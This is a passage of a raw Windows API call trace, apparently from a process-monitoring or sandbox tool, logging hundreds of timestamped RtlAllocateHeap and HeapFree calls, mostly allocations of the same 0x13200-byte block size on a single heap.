hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.509] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cf870 | out: hHeap=0x480000) returned 1 [0202.509] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x8f0) returned 0x4987a0 [0202.509] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x480) returned 0x4990a0 [0202.509] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x240) returned 0x4cdfe0 [0202.509] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.509] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4990a0 | out: hHeap=0x480000) returned 1 [0202.509] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.509] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x40) returned 0x4911c0 [0202.509] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48b490 | out: hHeap=0x480000) returned 1 [0202.509] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4ae1e0 | out: hHeap=0x480000) returned 1 [0202.510] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4b3dd0 | out: hHeap=0x480000) returned 1 [0202.511] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4911c0 | out: hHeap=0x480000) returned 1 [0202.511] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9900) returned 0x499a80 [0202.511] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1bf0) returned 0x4cdfe0 [0202.513] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.513] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9937) returned 0x4ae1e0 [0202.515] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499a80 | out: hHeap=0x480000) returned 1 [0202.515] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x20) returned 0x48aef0 [0202.515] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9900) returned 0x499a80 [0202.515] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1bf0) returned 0x4cdfe0 [0202.516] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4cdfe0 | out: hHeap=0x480000) returned 1 [0202.516] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9937) returned 0x4cdfe0 [0202.517] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499a80 | out: hHeap=0x480000) returned 1 [0202.518] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x40) returned 0x490d10 [0202.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48aef0 | out: hHeap=0x480000) returned 1 [0202.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4a3e30 | out: hHeap=0x480000) returned 1 [0202.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4be0e0 | out: hHeap=0x480000) returned 1 [0202.518] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x490f40 | out: hHeap=0x480000) returned 1 [0202.518] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x499a80 [0202.519] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x4b7b20 [0202.519] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x8) returned 0x484830 [0202.519] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x4d7920 [0202.520] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499800 [0202.520] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x484830 | out: hHeap=0x480000) returned 1 [0202.520] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x4eab30 [0202.520] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x18) returned 0x499940 [0202.520] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499800 | out: hHeap=0x480000) returned 1 [0202.520] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x4fdd40 [0202.520] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x20) returned 0x48aef0 [0202.521] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x499940 | out: hHeap=0x480000) returned 1 [0202.521] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x510f50 [0202.521] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x30) returned 0x48e680 [0202.521] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48aef0 | out: hHeap=0x480000) returned 1 [0202.521] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x524160 [0202.522] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x537370 [0202.522] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x48) returned 0x490630 [0202.522] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48e680 | out: hHeap=0x480000) returned 1 [0202.522] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x54a580 [0202.523] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x55d790 [0202.524] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1e60080 [0202.525] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x68) returned 0x483eb0 [0202.526] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x490630 | out: hHeap=0x480000) returned 1 [0202.526] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1e73290 [0202.526] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1e864a0 [0202.527] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1e996b0 [0202.527] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1eac8c0 [0202.528] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x98) returned 0x48b5c0 [0202.528] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x483eb0 | out: hHeap=0x480000) returned 1 [0202.528] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1ebfad0 [0202.528] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1ed2ce0 [0202.529] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1ee5ef0 [0202.529] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1ef9100 [0202.529] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1f0c310 [0202.530] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1f1f520 [0202.530] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xe0) returned 0x4888a0 [0202.530] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48b5c0 | out: hHeap=0x480000) returned 1 [0202.530] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1f32730 [0202.531] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x1ff0080 [0202.532] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2003290 [0202.532] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20164a0 [0202.533] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20296b0 [0202.533] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x203c8c0 [0202.534] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x204fad0 [0202.534] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2062ce0 [0202.534] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2075ef0 [0202.535] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x150) returned 0x48ac50 [0202.535] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4888a0 | out: hHeap=0x480000) returned 1 [0202.535] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2089100 [0202.536] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x209c310 [0202.536] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20af520 [0202.536] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20c2730 [0202.537] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20d5940 [0202.808] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20e8b50 [0202.809] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x20fbd60 [0202.809] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x210ef70 [0202.810] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2122180 [0202.811] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2135390 [0202.811] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21485a0 [0202.812] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x215b7b0 [0202.812] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x216e9c0 [0202.813] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2181bd0 [0202.813] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1f8) returned 0x4987a0 [0202.813] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x48ac50 | out: hHeap=0x480000) returned 1 [0202.813] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2194de0 [0202.814] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21a7ff0 [0202.814] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21bb200 [0202.815] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21ce410 [0202.815] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x21f0080 [0202.818] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2203290 [0202.818] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22164a0 [0202.819] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22296b0 [0202.819] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x223c8c0 [0202.820] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x224fad0 [0202.820] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2262ce0 [0202.821] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2275ef0 [0202.822] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2289100 [0202.822] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x229c310 [0202.825] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22af520 [0202.840] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22c2730 [0202.841] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22d5940 [0202.841] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22e8b50 [0202.842] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x22fbd60 [0202.843] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x230ef70 [0202.844] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2322180 [0202.845] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x2f0) returned 0x4989a0 [0202.845] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4987a0 | out: hHeap=0x480000) returned 1 [0202.845] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2335390 [0202.846] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x23485a0 [0202.846] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x235b7b0 [0202.847] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x236e9c0 [0202.847] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2381bd0 [0202.847] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2394de0 [0202.849] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x23a7ff0 [0202.850] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x23bb200 [0202.851] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x23ce410 [0202.853] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x23e1620 [0202.854] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x23f4830 [0202.855] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2407a40 [0202.856] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x241ac50 [0202.857] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x242de60 [0202.857] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2441070 [0202.858] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2454280 [0202.859] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2467490 [0202.859] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x247a6a0 [0202.860] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x248d8b0 [0202.860] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x24a0ac0 [0203.103] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x24b3cd0 [0203.104] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x24c6ee0 [0203.104] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x24da0f0 [0203.105] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x24ed300 [0203.105] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2500510 [0203.106] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2513720 [0203.106] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2526930 [0203.107] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2539b40 [0203.107] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x254cd50 [0203.108] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x255ff60 [0203.108] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2573170 [0203.109] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x468) returned 0x498ca0 [0203.109] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4989a0 | out: hHeap=0x480000) returned 1 [0203.109] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2586380 [0203.109] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2599590 [0203.110] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x25ac7a0 [0203.110] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x25bf9b0 [0203.111] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x25d2bc0 [0203.112] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x25f0080 [0203.115] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2603290 [0203.116] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26164a0 [0203.116] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26296b0 [0203.117] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x263c8c0 [0203.118] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x264fad0 [0203.118] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2662ce0 [0203.119] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2675ef0 [0203.119] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2689100 [0203.120] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x269c310 [0203.120] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26af520 [0203.121] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26c2730 [0203.122] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26d5940 [0203.122] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26e8b50 [0203.123] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x26fbd60 [0203.123] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x270ef70 [0203.124] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2722180 [0203.124] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2735390 [0203.125] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x27485a0 [0203.125] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x275b7b0 [0203.126] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x276e9c0 [0203.126] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2781bd0 [0203.126] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2794de0 [0203.127] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x27a7ff0 [0203.129] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x27bb200 [0203.129] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x27ce410 [0203.130] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x27e1620 [0203.131] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x27f4830 [0203.131] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2807a40 [0203.132] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x281ac50 [0203.132] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x282de60 [0203.133] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2841070 [0203.133] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2854280 [0203.134] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2867490 [0203.134] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x287a6a0 [0203.135] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x288d8b0 [0203.135] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x28a0ac0 [0203.136] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x28b3cd0 [0203.137] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x28c6ee0 [0203.137] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x28da0f0 [0203.138] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x28ed300 [0203.138] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2900510 [0203.139] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x698) returned 0x4acc90 [0203.625] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x498ca0 | out: hHeap=0x480000) returned 1 [0203.625] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2913720 [0203.626] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2926930 [0203.627] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2939b40 [0203.627] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x294cd50 [0203.627] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x295ff60 [0203.628] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2973170 [0203.628] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2986380 [0203.629] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2999590 [0203.629] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x29ac7a0 [0203.630] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x29bf9b0 [0203.630] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x29d2bc0 [0203.631] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x29e5dd0 [0203.631] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x29f8fe0 [0203.632] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a0c1f0 [0203.632] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a1f400 [0203.633] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a32610 [0203.633] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a45820 [0203.634] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a58a30 [0203.634] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a6bc40 [0203.638] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a7ee50 [0203.638] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2a92060 [0203.639] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2aa5270 [0203.639] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ab8480 [0203.639] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2acb690 [0203.640] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ade8a0 [0203.640] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2af1ab0 [0203.640] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b04cc0 [0203.641] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b17ed0 [0203.642] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b2b0e0 [0203.642] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b3e2f0 [0203.643] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b51500 [0203.643] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b64710 [0203.644] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b77920 [0203.644] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b8ab30 [0203.645] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2b9dd40 [0203.645] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2bb0f50 [0203.646] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2bc4160 [0203.646] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2bd7370 [0203.647] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2bea580 [0203.648] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2bfd790 [0203.648] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c109a0 [0203.648] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c23bb0 [0203.649] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c36dc0 [0203.649] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c49fd0 [0203.650] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c5d1e0 [0203.650] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c703f0 [0203.651] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c83600 [0203.652] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2c96810 [0203.652] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ca9a20 [0203.652] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2cbcc30 [0203.653] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ccfe40 [0203.653] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2ce3050 [0203.653] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2cf6260 [0203.681] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d09470 [0203.681] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d1c680 [0203.682] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d2f890 [0203.683] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d42aa0 [0203.683] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d55cb0 [0203.684] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d68ec0 [0203.684] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d7c0d0 [0203.685] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2d8f2e0 [0203.765] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2da24f0 [0203.766] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2db5700 [0203.767] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2dc8910 [0203.767] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2df0080 [0204.730] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e03290 [0204.730] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13200) returned 0x2e164a0 [0204.731] RtlAllocateHeap 